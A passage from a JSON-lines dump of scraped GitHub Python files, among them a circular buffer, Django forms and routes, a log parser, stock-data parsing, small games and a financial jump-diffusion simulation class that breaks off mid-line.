print(player.pass_cards(player.hand))\n\n\t# player = BasicAIPlayer(\"Test Player 1\")\n\t# player.hand = [Card(Rank.Four, Suit.Clubs), Card(Rank.Ace, Suit.Hearts), Card(Rank.King, Suit.Spades), Card(Rank.Ten, Suit.Spades),]\n\t# print(player.hand)\n\n\t# pass","repo_name":"yuanyi1029/FIT1045","sub_path":"Assignment 2/Hearts/basic_ai.py","file_name":"basic_ai.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29231709031","text":"from threading import Lock, Event\n\n\nclass Timeout(Exception):\n pass\n\n\nclass CircularBuffer(object):\n \"\"\"A circular buffer, accesible via read() and write().\"\"\"\n def __init__(self, size=16384):\n self.size = size\n\n self.rcnt = 0 # Total number of bytes read from the buffer\n self.wcnt = 0 # Total number of bytes written to the buffer\n self.data = self.size * ['\\0']\n\n self.mutex = Lock()\n self.nonempty = Event()\n self.nonempty.clear()\n self.notfull = Event()\n self.notfull.set()\n\n self.blocking = True\n\n def setblocking(self, val):\n self.blocking = bool(val)\n\n def read(self, n):\n \"\"\"Read up to n bytes from the circular buffer.\n\n Read up to n bytes from the circular buffer,\n and return them as a string.\n\n Block if no data are available.\n\n \"\"\"\n while True:\n with self.mutex:\n if self.nonempty.is_set():\n # Determine number of bytes to read\n cur = self.wcnt - self.rcnt\n assert cur > 0\n if n > cur:\n n = cur\n start = self.rcnt % self.size\n end = (self.rcnt + n) % self.size\n\n # Reset the counters\n self.rcnt = start\n self.wcnt = self.rcnt + cur\n\n if start < end:\n data = self.data[start:end]\n else:\n data = self.data[start:] + self.data[:end]\n\n self.rcnt += n\n if cur - n == 0:\n self.nonempty.clear()\n if n > 0:\n self.notfull.set()\n\n return ''.join(data)\n\n # We block without holding the mutex\n if not self.blocking:\n raise Timeout(\"read operation would block\")\n self.nonempty.wait()\n\n def write(self, data):\n \"\"\"Write up to n bytes into the circular buffer.\n\n Write up to n bytes into the circular buffer,\n block if no data are available.\n\n \"\"\"\n n = len(data)\n while True:\n with self.mutex:\n if self.notfull.is_set():\n # Determine number of bytes to write\n cur = self.wcnt - self.rcnt\n left = self.size - cur\n assert cur >= 0\n assert left > 0\n if n > left:\n n = left\n\n start = self.wcnt % self.size\n for i in range(n):\n self.data[(i+start) % self.size] = data[i]\n\n self.wcnt += n\n assert cur + n <= self.size\n if cur + n == self.size:\n self.notfull.clear()\n self.nonempty.set()\n return n\n\n # We block without holding the mutex\n if not self.blocking:\n raise Timeout(\"write operation would block\")\n self.notfull.wait()\n\n def readall(self, n):\n pass\n\n def writeall(self, data):\n data_len = len(data)\n n = self.write(data)\n\n while n < data_len:\n n += self.write(data[n:])\n\n assert(n == data_len)\n\n return n\n\n def close(self):\n pass\n\n # Handy aliases\n recv = read\n send = write\n recvall = readall\n sendall = writeall\n","repo_name":"grnet/snf-vncauthproxy","sub_path":"vncauthproxy/circbuffer.py","file_name":"circbuffer.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"31166063756","text":"from django import forms\n\nclass Form(forms.Form):\n \n required_css_class = 'required'\n \n def __init__(self, *args, **kwargs):\n if 'label_suffix' not in kwargs:\n # We generally don't want automatic colons after field names\n kwargs['label_suffix'] = ''\n super(Form, self).__init__(*args, **kwargs)\n \n def _html_output(self, *args, **kwargs):\n for field in self.fields.values():\n if field.help_text:\n field.widget.attrs['data-helptext'] = field.help_text\n field.help_text = None\n\n return super(Form, self)._html_output(*args, **kwargs)","repo_name":"michaelmulley/openparliament","sub_path":"parliament/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"38"} +{"seq_id":"39095680888","text":"import sys\nimport math\nimport numpy\n\n\ndef solve(input):\n\tmyString = str(input)\n\tanswerString = ''\n\tfor i in myString:\n\t\tif i == '4':\n\t\t\tanswerString = answerString + '1'\n\t\telse:\n\t\t\tanswerString = answerString + '0'\n\tanswer1 = int(answerString)\n\treturn answer1\n\ndef main(argv):\n\tt = int(input()) # read a line with a single integer\n\tfor i in range(1, t + 1):\n\t\tn = input()\n\t\tprint(\"Case #{}: {} {}\".format(i,solve(n),int(n) - solve(n)))\n \t\t# n = input().split(\" \") # read a list of integers, 2 in this case\n \t\t#print(\"Case #{}: {}\".format(i, n))\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)","repo_name":"robwon/CodeJam","sub_path":"2019/Qualifying Round/Foregone.py","file_name":"Foregone.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"72752904112","text":"import os\nimport argparse\nimport cv2\nfrom tqdm import tqdm\n\ndef change_image_suffix(folder_path, original_suffix, new_suffix):\n for filename in tqdm(os.listdir(folder_path), desc=\"Processing images\"):\n # if filename.endswith(original_suffix):\n original_file_path = os.path.join(folder_path, filename)\n new_filename = filename.replace(original_suffix, new_suffix)\n new_file_path = os.path.join(folder_path, new_filename)\n ori_suf = original_file_path.split(\".\")[-1]\n new_suf = new_file_path.split(\".\")[-1]\n if ori_suf == new_suf:\n os.rename(original_file_path, new_file_path)\n else:\n cv2.imwrite(new_file_path, cv2.imread(original_file_path))\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Change image file extensions in a folder.\")\n parser.add_argument(\"--folder_path\", type=str, help=\"Path to the folder containing images\")\n parser.add_argument(\"--original_suffix\", type=str, help=\"Original image file extension (e.g., .jpg)\")\n parser.add_argument(\"--new_suffix\", type=str, help=\"New image file extension (e.g., .png)\")\n\n args = parser.parse_args()\n\n change_image_suffix(args.folder_path, args.original_suffix, args.new_suffix)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ywher/segmentation_tools","sub_path":"change_file_suffix.py","file_name":"change_file_suffix.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"14052111603","text":"#!/usr/bin/python3\n'''\nModule for log parsing\nlog data passed in format:\n - [] \"GET /projects/260 HTTP/1.1\" \n84.27.67.17 - [2023-10-19 10:40:59.756530] \"GET /projects/260 HTTP/1.1\" 200 437\n'''\nimport re\nimport sys\n\n\ndef print_logs(lines, regex, global_log_data):\n '''\n description: function to output global log file data and status logs\n Args:\n lines (list): list of log data\n regex (re.Pattern): patter to extract file size and status code\n return: None\n out format:\n File size: \n : \n : \n if a status code doesn't appear or is not an integer,\n don't print anything for this status code\n '''\n file_sizes_archive = {}\n\n list_status_code_count = []\n\n for line in lines:\n match_data = regex.match(line)\n statu_code, file_size = match_data.group(3), match_data.group(4)\n\n if file_size not in file_sizes_archive:\n file_sizes_archive.update({file_size: {statu_code: 1}})\n else:\n if statu_code not in file_sizes_archive[file_size]:\n file_sizes_archive[file_size].update({statu_code: 1})\n else:\n file_sizes_archive[file_size][statu_code] += 1\n\n for key in file_sizes_archive.keys():\n global_log_data['file_size'] += int(key)\n\n print(f'File size: {global_log_data[\"file_size\"]}')\n\n for value in file_sizes_archive.values():\n for code, count in value.items():\n if code in global_log_data['codes']:\n global_log_data['codes'][code] += count\n else:\n global_log_data['codes'].update({code: count})\n\n for code, count in global_log_data['codes'].items():\n try:\n list_status_code_count.append((int(code), count))\n except TypeError:\n continue\n\n # status codes should be printed in ascending order\n sorted_list = sorted(list_status_code_count, key=lambda item: item[0])\n\n for items in sorted_list:\n print(f'{items[0]}: {items[1]}')\n\n\nif __name__ == '__main__':\n pattern1 = r'^([\\d.]+) - \\[(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}\\.\\d{6})\\]'\n pattern2 = r' \"GET /projects/260 HTTP/1.1\" (\\d{3}) (\\d+)$'\n log_pattern = pattern1 + pattern2\n\n log_regex = re.compile(log_pattern)\n\n global_log_data = {'file_size': 0, 'codes': {}}\n\n line_count = 1\n lines = []\n\n try:\n for line in sys.stdin:\n\n if log_regex.match(line):\n lines.append(line)\n line_count += 1\n\n if line_count % 10 == 0:\n print_logs(lines, log_regex, global_log_data)\n except KeyboardInterrupt:\n print_logs(lines, log_regex, global_log_data)\n","repo_name":"colinochieng/alx-interview","sub_path":"0x03-log_parsing/0-stats.py","file_name":"0-stats.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21424731855","text":"# A neural network which approximates linear function y = 2x + 3.\n# The network has 1 layer with 1 node, which has 1 input (and a bias).\n# As there is no activation effectively this node is a linear function.\n# After +/- 10.000 iterations W should be close to 2 and B should be close to 3.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nnp.set_printoptions(formatter={\"float\": \"{: 0.3f}\".format}, linewidth=np.inf)\nnp.random.seed(1)\n\nX = np.array([[0], [1], [2], [3], [4]]) # X = input (here: 5 values)\nY = 2 * X + 3 # Y = output: y = 2x + 3 (as many values as there are X's)\n\nW = np.random.normal(scale=0.1, size=(1, 1)) # layer: (1, 1) = 1 node with 1 input\nB = np.random.normal(scale=0.1, size=(1, 1)) # bias: (1, 1) = for 1 node (and by definition only 1 bias value per node)\n\nlearning_rate = 0.001\niterations = 10000\nerror = []\n\nprint(\"initial :\", \"W =\", W, \"B =\", B, \"(random initialization)\")\n\nm = X.shape[0]\n\nfor _ in range(iterations):\n # forward pass\n a = W.dot(X.T) + B\n\n # back propagation\n da = a - Y.T # da = error\n dz = da # no activation\n dw = dz.dot(X) / m\n db = np.sum(dz, axis=1, keepdims=True) / m\n\n W -= learning_rate * dw\n B -= learning_rate * db\n\n error.append(np.average(da ** 2))\n\nprint(\"result :\", \"W =\", W, \"B =\", B, \"(after {} iterations)\".format(iterations))\nprint(\"expected: W = 2, B = 3\")\n\nplt.plot(range(iterations), error)\nplt.title(\"MSE (mean squared error)\")\nplt.xlabel(\"training iterations\")\nplt.ylabel(\"mse\")\nplt.show()\n","repo_name":"nealholt/python_programming_curricula","sub_path":"CS3/0600_neural networks_handwriting_recognition/numpy_nnet/erikdelange/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"38"} +{"seq_id":"34829195622","text":"import os\nimport pickle\nimport copy\nimport numpy as np\n\n\nCODES = {'': 0, '': 1, '': 2, '': 3 }\n\n\ndef load_data(path):\n \"\"\"\n Load Dataset from File\n \"\"\"\n input_file = os.path.join(path)\n with open(input_file, 'r', encoding='utf-8') as f:\n return f.read()\n\n\ndef preprocess_and_save_data(source_path, target_path, text_to_ids):\n \"\"\"\n Preprocess Text Data. Save to to file.\n \"\"\"\n # Preprocess\n source_text = load_data(source_path)\n target_text = load_data(target_path)\n\n source_text = source_text.lower()\n target_text = target_text.lower()\n\n source_vocab_to_int, source_int_to_vocab = create_lookup_tables(source_text)\n target_vocab_to_int, target_int_to_vocab = create_lookup_tables(target_text)\n\n source_text, target_text = text_to_ids(source_text, target_text, source_vocab_to_int, target_vocab_to_int)\n\n # Save Data\n with open('preprocess.p', 'wb') as out_file:\n pickle.dump((\n (source_text, target_text),\n (source_vocab_to_int, target_vocab_to_int),\n (source_int_to_vocab, target_int_to_vocab)), out_file)\n\n\ndef load_preprocess():\n \"\"\"\n Load the Preprocessed Training data and return them in batches of or less\n \"\"\"\n with open('preprocess.p', mode='rb') as in_file:\n return pickle.load(in_file)\n\n\ndef create_lookup_tables(text):\n \"\"\"\n Create lookup tables for vocabulary\n \"\"\"\n vocab = set(text.split())\n vocab_to_int = copy.copy(CODES)\n\n for v_i, v in enumerate(vocab, len(CODES)):\n vocab_to_int[v] = v_i\n\n int_to_vocab = {v_i: v for v, v_i in vocab_to_int.items()}\n\n return vocab_to_int, int_to_vocab\n\n\ndef save_params(params):\n \"\"\"\n Save parameters to file\n \"\"\"\n with open('params.p', 'wb') as out_file:\n pickle.dump(params, out_file)\n\n\ndef load_params():\n \"\"\"\n Load parameters from file\n \"\"\"\n with open('params.p', mode='rb') as in_file:\n return pickle.load(in_file)\n\n\ndef batch_data(source, target, batch_size):\n \"\"\"\n Batch source and target together\n \"\"\"\n for batch_i in range(0, len(source)//batch_size):\n start_i = batch_i * batch_size\n source_batch = source[start_i:start_i + batch_size]\n target_batch = target[start_i:start_i + batch_size]\n yield np.array(pad_sentence_batch(source_batch)), np.array(pad_sentence_batch(target_batch))\n\n\ndef pad_sentence_batch(sentence_batch):\n \"\"\"\n Pad sentence with id\n \"\"\"\n max_sentence = max([len(sentence) for sentence in sentence_batch])\n return [sentence + [CODES['']] * (max_sentence - len(sentence))\n for sentence in sentence_batch]\n","repo_name":"udacity/deep-learning","sub_path":"language-translation/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":3967,"dataset":"github-code","pt":"38"} +{"seq_id":"12645868431","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nsamsung = pd.read_csv(\"./data/csv/삼성전자 1120.csv\",\r\n header=0,index_col=0,sep=\",\",encoding='CP949')\r\n\r\n# ==================== samsung x ====================\r\n\r\nsamsung_sort = pd.DataFrame(samsung).sort_values(\"일자\",ascending=[\"True\"])\r\nsamsung_x_row = samsung_sort.loc[\"2018/05/04\":\"2020/11/17\"] \r\nsamsung_x_tv = samsung_x_row[\"거래량\"] \r\nsamsung_x_ta = samsung_x_row[\"금액(백만)\"] \r\nsamsung_x_o = samsung_x_row[\"시가\"] \r\nsamsung_x_c = samsung_x_row[\"종가\"]\r\n\r\nfor i in range(len(samsung_x_tv.index)):\r\n samsung_x_tv.iloc[i] = int(samsung_x_tv.iloc[i].replace(\",\",\"\"))\r\n samsung_x_ta.iloc[i] = int(samsung_x_ta.iloc[i].replace(\",\",\"\"))\r\n samsung_x_o.iloc[i] = int(samsung_x_o.iloc[i].replace(\",\",\"\"))\r\n samsung_x_c.iloc[i] = int(samsung_x_c.iloc[i].replace(\",\",\"\"))\r\n\r\nsamsung_x_set = []\r\n\r\nfor j in range(len(samsung_x_tv.index)):\r\n samsung_x_set.append([int(samsung_x_ta.iloc[j]*1000000/samsung_x_tv.iloc[j]),samsung_x_o.iloc[j],samsung_x_c.iloc[j]]) \r\n\r\nsamsung_x = np.array(samsung_x_set)\r\n\r\n# ==================== samsung y ====================\r\n\r\nsamsung_sort2 = pd.DataFrame(samsung).sort_values(\"일자\",ascending=[\"True\"])\r\nsamsung_y_row = samsung_sort2.loc[\"2018/05/15\":\"2020/11/19\"]\r\nsamsung_y_c = samsung_y_row[\"시가\"]\r\n\r\n\r\nfor i in range(len(samsung_y_c.index)):\r\n samsung_y_c.iloc[i] = int(samsung_y_c.iloc[i].replace(\",\",\"\"))\r\n\r\nsamsung_y_set = []\r\nfor j in range(len(samsung_y_c.index)):\r\n samsung_y_set.append(samsung_y_c.iloc[j])\r\n\r\n\r\n\r\nsamsung_y = np.array(samsung_y_set)\r\n\r\n\r\nnp.save(\"./data/samsung_x.npy\", arr=samsung_x)\r\nnp.save(\"./data/samsung_y.npy\", arr=samsung_y)\r\nprint(samsung_x.shape) # (624, 2)\r\nprint(samsung_y.shape) # (620,)\r\n\r\n'''\r\nprint(\"삼성끝\")\r\n\r\n# ==================== bit computer ====================\r\n'''\r\nbit = pd.read_csv(\"./data/csv/비트컴퓨터 1120.csv\",header=0,index_col=0,sep=\",\",encoding='CP949') \r\n\r\nbit_sort = pd.DataFrame(bit).sort_values(\"일자\",ascending=[\"True\"])\r\nbit_x_row = bit_sort.loc[\"2018/05/04\":\"2020/11/17\"] \r\nbit_x_tv = bit_x_row[\"거래량\"] \r\nbit_x_ta = bit_x_row[\"금액(백만)\"] \r\nbit_x_o = bit_x_row[\"시가\"] \r\nbit_x_h = bit_x_row[\"고가\"]\r\nbit_x_c = bit_x_row[\"종가\"]\r\n\r\nfor i in range(len(bit_x_tv.index)):\r\n bit_x_tv.iloc[i] = int(bit_x_tv.iloc[i].replace(\",\",\"\"))\r\n bit_x_ta.iloc[i] = int(bit_x_ta.iloc[i].replace(\",\",\"\"))\r\n bit_x_o.iloc[i] = int(bit_x_o.iloc[i].replace(\",\",\"\"))\r\n bit_x_h.iloc[i] = int(bit_x_h.iloc[i].replace(\",\",\"\"))\r\n bit_x_c.iloc[i] = int(bit_x_c.iloc[i].replace(\",\",\"\"))\r\n\r\nbit_x_set = []\r\nfor j in range(len(bit_x_tv.index)):\r\n bit_x_set.append([int(bit_x_ta.iloc[j]*1000000/bit_x_tv.iloc[j]),\r\n bit_x_o.iloc[j],\r\n bit_x_h.iloc[j],\r\n bit_x_c.iloc[j]]) \r\n\r\nbit_x = np.array(bit_x_set)\r\nnp.save(\"./data/bit_x.npy\", arr=bit_x)\r\n\r\nprint(\"비트끝\")\r\n# ==================== gold ====================\r\n\r\ngold = pd.read_csv(\"./data/csv/금현물.csv\",header=0,index_col=0,sep=\",\",encoding='CP949') \r\n\r\ngold_sort = pd.DataFrame(gold).sort_values(\"일자\",ascending=[\"True\"])\r\ngold_x_row = gold_sort.loc[\"2018/05/04\":\"2020/11/17\"] \r\ngold_x_tv = gold_x_row[\"거래량\"] \r\ngold_x_ta = gold_x_row[\"거래대금(백만)\"] \r\ngold_x_o = gold_x_row[\"시가\"] \r\ngold_x_h = gold_x_row[\"고가\"] \r\ngold_x_l = gold_x_row[\"저가\"] \r\ngold_x_c = gold_x_row[\"종가\"]\r\n\r\nfor i in range(len(gold_x_tv.index)):\r\n gold_x_tv.iloc[i] = int(gold_x_tv.iloc[i].replace(\",\",\"\"))\r\n gold_x_ta.iloc[i] = int(gold_x_ta.iloc[i].replace(\",\",\"\"))\r\n gold_x_o.iloc[i] = int(gold_x_o.iloc[i].replace(\",\",\"\"))\r\n gold_x_h.iloc[i] = int(gold_x_h.iloc[i].replace(\",\",\"\"))\r\n gold_x_l.iloc[i] = int(gold_x_l.iloc[i].replace(\",\",\"\"))\r\n gold_x_c.iloc[i] = int(gold_x_c.iloc[i].replace(\",\",\"\"))\r\n\r\ngold_x_set = []\r\n\r\nfor j in range(len(gold_x_tv.index)):\r\n gold_x_set.append([int(gold_x_ta.iloc[j]*1000000/gold_x_tv.iloc[j]),\r\n gold_x_o.iloc[j],\r\n gold_x_h.iloc[j],\r\n gold_x_l.iloc[j],\r\n gold_x_c.iloc[j]]) \r\n\r\ngold_x = np.array(gold_x_set)\r\nnp.save(\"./data/gold_x.npy\", arr=gold_x)\r\n\r\nprint(\"gold끝\")\r\n\r\n# ==================== kosdaq ====================\r\n\r\nkosdaq = pd.read_csv(\"./data/csv/코스닥.csv\",header=0,index_col=0,sep=\",\",encoding='CP949') \r\n\r\nkosdaq_sort = pd.DataFrame(kosdaq).sort_values(\"일자\",ascending=[\"True\"])\r\nkosdaq_x_row = kosdaq_sort.loc[\"2018/05/04\":\"2020/11/17\"] \r\nkosdaq_x_tv = kosdaq_x_row[\"거래량\"] \r\nkosdaq_x_ta = kosdaq_x_row[\"거래대금\"] \r\nkosdaq_x_o = kosdaq_x_row[\"시가\"] \r\nkosdaq_x_h = kosdaq_x_row[\"고가\"] \r\nkosdaq_x_l = kosdaq_x_row[\"저가\"] \r\nkosdaq_x_c = kosdaq_x_row[\"현재가\"]\r\nkosdaq_x_u = kosdaq_x_row[\"상승\"]\r\n\r\nfor i in range(len(kosdaq_x_tv.index)):\r\n kosdaq_x_tv.iloc[i] = int(kosdaq_x_tv.iloc[i].replace(\",\",\"\"))\r\n kosdaq_x_ta.iloc[i] = int(kosdaq_x_ta.iloc[i].replace(\",\",\"\"))\r\n kosdaq_x_o.iloc[i] = int(kosdaq_x_o.iloc[i])\r\n kosdaq_x_h.iloc[i] = int(kosdaq_x_h.iloc[i])\r\n kosdaq_x_l.iloc[i] = int(kosdaq_x_l.iloc[i])\r\n kosdaq_x_c.iloc[i] = int(kosdaq_x_c.iloc[i])\r\n kosdaq_x_u.iloc[i] = int(kosdaq_x_u.iloc[i].replace(\",\",\"\"))\r\n\r\nkosdaq_x_set = []\r\n\r\nfor j in range(len(kosdaq_x_tv.index)):\r\n kosdaq_x_set.append([int(kosdaq_x_tv.iloc[j]*1000000/kosdaq_x_tv.iloc[j]*1000),\r\n kosdaq_x_o.iloc[j],\r\n kosdaq_x_h.iloc[j],\r\n kosdaq_x_l.iloc[j],\r\n kosdaq_x_u.iloc[j],\r\n kosdaq_x_c.iloc[j]]) \r\n\r\nkosdaq_x = np.array(kosdaq_x_set)\r\nnp.save(\"./data/kosdaq_x.npy\", arr=kosdaq_x)\r\n\r\nprint(\"kosdaq끝\")\r\n","repo_name":"GODKIMCHI142/bit_seoul","sub_path":"Study/keras/stcok_data_parsing.py","file_name":"stcok_data_parsing.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71153900912","text":"\"\"\"\nFichero para separar routing por aplicacionesun proyecto.\n\nDe modo que definimos para esta app las rutas que son exclusivamente suyas y luego las importamos en el router\nprincipal del proyecto.\n\"\"\"\n\nfrom django.urls import path\nfrom traperos import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('respuesta/', views.respuesta_simple, name='respuesta'),\n path('traperos/', views.traperos_lista, name='traperos'),\n path('traperos/', views.traperos_id, name='trapero_id'),\n path('discos/', views.DiscoListView.as_view(), name='discos'),\n path('discos/', views.DiscoDetailView.as_view(), name='disco_id'),\n path('tiraeras/', views.tiraeras_lista, name='tiraeras'),\n path('tiraeras/', views.tiraeras_id, name='tiraera_id'),\n path('tiraeras_trapero/', views.tiraeras_trapero, name='tiraeras_trapero'),\n path('alertas/', views.AlertaCreate.as_view(), name='alertas'),\n path('alertas/gracias/', views.AlertaGraciasView.as_view(), name='alertas'),\n path('fin/', views.FinView.as_view(), name='fin'),\n path('prueba/', views.TextView.as_view(), name='a')\n]\n","repo_name":"albeerto26/DjangoServerHeroku","sub_path":"traperos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28583696038","text":"import random\r\n\r\nrandom_choice = random.randint(0,2)\r\n\r\nif random_choice == 0:\r\n computer_choice = 'rock'\r\nelif random_choice == 1:\r\n computer_choice = 'paper'\r\nelse:\r\n computer_choice = 'scissors'\r\n\r\nmy_choice = input('Rock, Paper, or Scissors? ')\r\nwhile my_choice != \"\":\r\n if my_choice == 'rock':\r\n if computer_choice == 'scissors':\r\n print('You chose rock and computer chose scissors...You won')\r\n elif computer_choice == 'rock':\r\n print('You chose rock and computer chose rock...You are both tied')\r\n else:\r\n print('You chose rock and computer chose paper...You lose')\r\n elif my_choice == 'paper':\r\n if computer_choice == 'scissors':\r\n print('You chose paper and computer chose scissors...You lose')\r\n elif computer_choice == 'rock':\r\n print('You chose paper and computer chose rock...You won')\r\n else:\r\n print('You chose paper and computer chose paper...You are both tied')\r\n else:\r\n if computer_choice == 'scissors':\r\n print('You chose scissors and computer chose scissors...You are both tied')\r\n elif computer_choice == 'rock':\r\n print('You chose scissors and computer chose rock...You lose')\r\n else:\r\n print('You chose scissors and computer chose paper...You won')\r\n\r\n\r\n print('Computer has pick', computer_choice)\r\n","repo_name":"itsmealex56/myPyVenture","sub_path":"Chapter 3/jackenpoy.py","file_name":"jackenpoy.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"844225110","text":"#\n# DX Analytics\n# Base Classes and Model Classes for Simulation\n# square_root_jump_diffusion.py\n#\n# DX Analytics is a financial analytics library, mainly for\n# derviatives modeling and pricing by Monte Carlo simulation\n#\n# (c) Dr. Yves J. Hilpisch\n# The Python Quants GmbH\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see http://www.gnu.org/licenses/.\n#\nfrom ..frame import *\nfrom .simulation_class import simulation_class\nfrom .square_root_diffusion import *\n\n\nclass square_root_jump_diffusion(simulation_class):\n ''' Class to generate simulated paths based on\n the square-root jump diffusion model.\n\n Attributes\n ==========\n name : string\n name of the object\n mar_env : instance of market_environment\n market environment data for simulation\n corr : boolean\n True if correlated with other model object\n\n Methods\n =======\n update :\n updates parameters\n generate_paths :\n returns Monte Carlo paths for the market environment\n '''\n\n def __init__(self, name, mar_env, corr=False):\n super(square_root_jump_diffusion, self).__init__(name, mar_env, corr)\n try:\n self.kappa = mar_env.get_constant('kappa')\n self.theta = mar_env.get_constant('theta')\n self.lamb = mar_env.get_constant('lambda')\n self.mu = mar_env.get_constant('mu')\n self.delt = mar_env.get_constant('delta')\n except:\n print('Error parsing market environment.')\n\n def update(self, pricing_date=None, initial_value=None, volatility=None,\n kappa=None, theta=None, lamb=None, mu=None, delt=None,\n final_date=None):\n if pricing_date is not None:\n self.pricing_date = pricing_date\n self.time_grid = None\n self.generate_time_grid()\n if initial_value is not None:\n self.initial_value = initial_value\n if volatility is not None:\n self.volatility = volatility\n if kappa is not None:\n self.kappa = kappa\n if theta is not None:\n self.theta = theta\n if lamb is not None:\n self.lamb = lamb\n if mu is not None:\n self.mu = mu\n if delt is not None:\n self.delt = delt\n if final_date is not None:\n self.final_date = final_date\n self.instrument_values = None\n self.time_grid = None\n\n def generate_paths(self, fixed_seed=True, day_count=365.):\n if self.time_grid is None:\n self.generate_time_grid()\n M = len(self.time_grid)\n I = self.paths\n paths = np.zeros((M, I))\n paths_ = np.zeros_like(paths)\n paths[0] = self.initial_value\n paths_[0] = self.initial_value\n if self.correlated is False:\n rand = sn_random_numbers((1, M, I),\n fixed_seed=fixed_seed)\n else:\n rand = self.random_numbers\n snr = sn_random_numbers((1, M, I),\n fixed_seed=fixed_seed)\n rj = self.lamb * (np.exp(self.mu + 0.5 * self.delt ** 2) - 1)\n\n for t in range(1, len(self.time_grid)):\n dt = (self.time_grid[t] - self.time_grid[t - 1]).days / day_count\n if self.correlated is False:\n ran = rand[t]\n else:\n ran = np.dot(self.cholesky_matrix, rand[:, t, :])\n ran = ran[self.rn_set]\n poi = np.random.poisson(self.lamb * dt, I)\n # full truncation Euler discretization\n paths_[t, :] = (paths_[t - 1, :] + self.kappa *\n (self.theta - np.maximum(0, paths_[t - 1, :])) * dt +\n np.sqrt(np.maximum(0, paths_[t - 1, :])) *\n self.volatility * np.sqrt(dt) * ran +\n ((np.exp(self.mu + self.delt * snr[t]) - 1) * poi) *\n np.maximum(0, paths_[t - 1, :]) - rj * dt)\n paths[t, :] = np.maximum(0, paths_[t, :])\n self.instrument_values = paths\n\n\nclass square_root_jump_diffusion_plus(square_root_jump_diffusion):\n ''' Class to generate simulated paths based on\n the square-root jump diffusion model with term structure.\n\n Attributes\n ==========\n name : string\n name of the object\n mar_env : instance of market_environment\n market environment data for simulation\n corr : boolean\n True if correlated with other model object\n\n Methods\n =======\n srd_forward_error :\n error function for forward rate/vols calibration\n generate_shift_base :\n generates a shift base to take term structure into account\n update :\n updates parameters\n update_shift_values :\n updates shift values for term structure\n generate_paths :\n returns Monte Carlo paths for the market environment\n update_forward_rates :\n updates forward rates (vol, int. rates) for given time grid\n '''\n\n def __init__(self, name, mar_env, corr=False):\n super(square_root_jump_diffusion_plus,\n self).__init__(name, mar_env, corr)\n try:\n self.term_structure = mar_env.get_curve('term_structure')\n except:\n self.term_structure = None\n print('Missing Term Structure.')\n\n self.forward_rates = []\n self.shift_base = None\n self.shift_values = []\n\n def srd_forward_error(self, p0):\n if p0[0] < 0 or p0[1] < 0 or p0[2] < 0:\n return 100\n f_model = srd_forwards(self.initial_value, p0,\n self.term_structure[:, 0])\n\n MSE = np.sum((self.term_structure[:, 1] -\n f_model) ** 2) / len(f_model)\n return MSE\n\n def generate_shift_base(self, p0):\n # calibration\n opt = sco.fmin(self.srd_forward_error, p0)\n # shift_calculation\n f_model = srd_forwards(self.initial_value, opt,\n self.term_structure[:, 0])\n shifts = self.term_structure[:, 1] - f_model\n self.shift_base = np.array((self.term_structure[:, 0], shifts)).T\n\n def update_shift_values(self, k=1):\n if self.shift_base is not None:\n t = get_year_deltas(self.shift_base[:, 0])\n tck = sci.splrep(t, self.shift_base[:, 1], k=k)\n self.generate_time_grid()\n st = get_year_deltas(self.time_grid)\n self.shift_values = np.array(list(zip(self.time_grid,\n sci.splev(st, tck, der=0))))\n else:\n self.shift_values = np.array(list(zip(self.time_grid,\n np.zeros(len(self.time_grid)))))\n\n def generate_paths(self, fixed_seed=True, day_count=365.):\n if self.time_grid is None:\n self.generate_time_grid()\n self.update_shift_values()\n M = len(self.time_grid)\n I = self.paths\n paths = np.zeros((M, I))\n paths_ = np.zeros_like(paths)\n paths[0] = self.initial_value\n paths_[0] = self.initial_value\n if self.correlated is False:\n rand = sn_random_numbers((1, M, I),\n fixed_seed=fixed_seed)\n else:\n rand = self.random_numbers\n snr = sn_random_numbers((1, M, I),\n fixed_seed=fixed_seed)\n # forward_rates = self.discount_curve.get_forward_rates(\n # self.time_grid, dtobjects=True)\n rj = self.lamb * (np.exp(self.mu + 0.5 * self.delt ** 2) - 1)\n for t in range(1, len(self.time_grid)):\n dt = (self.time_grid[t] - self.time_grid[t - 1]).days / day_count\n if self.correlated is False:\n ran = rand[t]\n else:\n ran = 